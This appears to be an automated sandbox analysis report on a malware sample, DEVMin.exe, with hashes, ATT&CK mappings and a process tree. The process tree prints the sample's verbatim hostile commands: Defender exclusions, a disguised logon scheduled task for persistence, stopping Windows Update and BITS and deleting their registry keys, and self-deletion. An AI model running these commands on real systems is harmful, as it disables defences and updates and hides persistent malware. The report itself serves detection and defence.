ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164

General

Target

DEVMin.exe
Size

3.6MB
MD5

279c66b28f19a510ad6c0f155871fac3
SHA1

427bcf049de4b9a848593463e0f36265baa6164c
SHA256

ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164
SHA512

f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161
SSDEEP

98304:JHmeIFVx0/o2Jrd9o2oNiN0KL5Zm2kVehky:DIFVxQJM2eRZfQhky

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

DEVMin.exe

description	pid	process	target process
PID 1992 created 1304	1992	DEVMin.exe	Explorer.EXE
PID 1992 created 1304	1992	DEVMin.exe	Explorer.EXE
PID 1992 created 1304	1992	DEVMin.exe	Explorer.EXE
PID 1992 created 1304	1992	DEVMin.exe	Explorer.EXE
PID 1992 created 1304	1992	DEVMin.exe	Explorer.EXE

Drops file in Drivers directory 1 IoCs

Processes:

DEVMin.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts DEVMin.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1744 cmd.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	DEVMin.exe

pid	process
1744	cmd.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1440 sc.exe
1500 sc.exe
1540 sc.exe
892 sc.exe
1624 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1620 schtasks.exe

pid	process
1440	sc.exe
1500	sc.exe
1540	sc.exe
892	sc.exe
1624	sc.exe

pid	process
1620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

DEVMin.exepowershell.exepowershell.exe

pid	process
1992	DEVMin.exe
1992	DEVMin.exe
2024	powershell.exe
1992	DEVMin.exe
1992	DEVMin.exe
1992	DEVMin.exe
1992	DEVMin.exe
1992	DEVMin.exe
1992	DEVMin.exe
268	powershell.exe
1992	DEVMin.exe
1992	DEVMin.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeShutdownPrivilege	1224	powercfg.exe
Token: SeShutdownPrivilege	272	powercfg.exe
Token: SeShutdownPrivilege	1324	powercfg.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeShutdownPrivilege	1864	powercfg.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

cmd.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 656 wrote to memory of 1224	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1224	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1224	656	cmd.exe	powercfg.exe
PID 732 wrote to memory of 1440	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1440	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1440	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1500	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1500	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1500	732	cmd.exe	sc.exe
PID 656 wrote to memory of 272	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 272	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 272	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1324	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1324	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1324	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1864	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1864	656	cmd.exe	powercfg.exe
PID 656 wrote to memory of 1864	656	cmd.exe	powercfg.exe
PID 732 wrote to memory of 1540	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1540	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1540	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1624	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1624	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1624	732	cmd.exe	sc.exe
PID 732 wrote to memory of 892	732	cmd.exe	sc.exe
PID 732 wrote to memory of 892	732	cmd.exe	sc.exe
PID 732 wrote to memory of 892	732	cmd.exe	sc.exe
PID 732 wrote to memory of 1488	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1488	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1488	732	cmd.exe	reg.exe
PID 732 wrote to memory of 612	732	cmd.exe	reg.exe
PID 732 wrote to memory of 612	732	cmd.exe	reg.exe
PID 732 wrote to memory of 612	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1120	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1120	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1120	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1400	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1400	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1400	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1048	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1048	732	cmd.exe	reg.exe
PID 732 wrote to memory of 1048	732	cmd.exe	reg.exe
PID 268 wrote to memory of 1620	268	powershell.exe	schtasks.exe
PID 268 wrote to memory of 1620	268	powershell.exe	schtasks.exe
PID 268 wrote to memory of 1620	268	powershell.exe	schtasks.exe
PID 1744 wrote to memory of 764	1744	cmd.exe	choice.exe
PID 1744 wrote to memory of 764	1744	cmd.exe	choice.exe
PID 1744 wrote to memory of 764	1744	cmd.exe	choice.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1304

C:\Users\Admin\AppData\Local\Temp\DEVMin.exe
"C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#owhqpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'
3⤵
- Creates scheduled task(s)
PID:1620

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:656

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:272

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1440

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1500

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1540

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:892

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1624

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1488

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:612

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1120

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1400

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1048

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:764

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Impair Defenses

1

T1562

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36K3VUO6VH7E1ET55NXF.temp
Filesize
7KB

MD5
22d22870a64e87573a1b2e314e2e73b8

SHA1
67ab118a231f9c0fb13eaf56d226cb76f38c34c8

SHA256
b6e360925220e35dee78de967b7458d5527bdce875230e89d0a8addf438937ff

SHA512
690cadc2bbe6337ce9801d1fa4df2bf710fb4a2f5d097470b50d3799ca21a3fb031ab5887984886a8d3c9df45dd88e72ad5c4a7d755cd8c49b8b7897a49db4ea

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
22d22870a64e87573a1b2e314e2e73b8

SHA1
67ab118a231f9c0fb13eaf56d226cb76f38c34c8

SHA256
b6e360925220e35dee78de967b7458d5527bdce875230e89d0a8addf438937ff

SHA512
690cadc2bbe6337ce9801d1fa4df2bf710fb4a2f5d097470b50d3799ca21a3fb031ab5887984886a8d3c9df45dd88e72ad5c4a7d755cd8c49b8b7897a49db4ea

Download Submit
memory/268-71-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/268-68-0x000000001B100000-0x000000001B3E2000-memory.dmp

Filesize
2.9MB

Download
memory/268-69-0x0000000002250000-0x0000000002258000-memory.dmp

Filesize
32KB

Download
memory/268-72-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/268-70-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/268-73-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1992-75-0x000000013F220000-0x000000013F5BA000-memory.dmp

Filesize
3.6MB

Download
memory/2024-61-0x00000000024EB000-0x0000000002522000-memory.dmp

Filesize
220KB

Download
memory/2024-60-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/2024-59-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2024-58-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads